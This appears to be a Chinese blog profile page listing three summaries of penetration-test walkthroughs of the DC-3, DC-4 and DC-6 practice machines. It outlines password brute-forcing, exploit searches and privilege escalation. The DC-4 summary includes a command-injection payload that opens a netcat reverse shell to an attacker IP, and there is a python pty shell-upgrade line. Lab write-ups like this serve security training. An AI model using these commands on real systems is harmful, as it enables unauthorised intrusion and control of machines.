- 博客(10)
- 收藏
- 关注
原创 DC-6靶机渗透测试
hosts定向wpscan枚举账号(因为是WordPress博客)wpscan账号密码爆破dirb目录扫描得到后台登录地址searchsploit搜索Activity monitor插件的相关漏洞,得到漏洞利用文件运行漏洞利用文件,得到反弹shell打开交互模式 python -c 'import pty;pty.spawn("/bin/bash")'进入到home目录查看DC-6的用户目录发现graham账号的密码,进行ssh登录成功使用sudo -l查看权限利用命
2023-12-20 21:24:58
957
1
原创 DC-4靶机渗透测试
1、使用kali的字典爆破登录密码: /usr/share/john下的password.lstburp抓包,并且爆破到admin账号的密码2、发现命令执行,进行利用:burp修改数据包添加反弹shell的相关命令发送到靶机,kali监听到获取shell反弹radio=nc+192.168.182.146+4444+-e+/bin/bash&submit=Run3、利用python获取交互shell:python -c 'import pty;pty.spawn("/bin/sh")
2023-12-20 18:03:57
821
1
原创 DC-3靶机渗透测试
此文件给出了打穿靶机的关键,就是提到root权限就可以拿到flag,我们进行网站漏洞测试,发现了文件上传漏洞,在Templates/Templates/Beez3。最终我们将账户与密码爆出,但密码进行了哈希加密,我们使用kali自带解密工具john进行解密,我们先将加密密文放入txt文件中,在进行解密。这里他告诉了可以使用溢出提权(exp提权),并提供了提权工具,以及使用方法,使用wget进行工具下载。啥也没有,命令提权此方法行不通,突然想到可以用操作系统漏洞提权,先查看linux版本。
2023-12-19 23:08:22
1029
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人
RSS订阅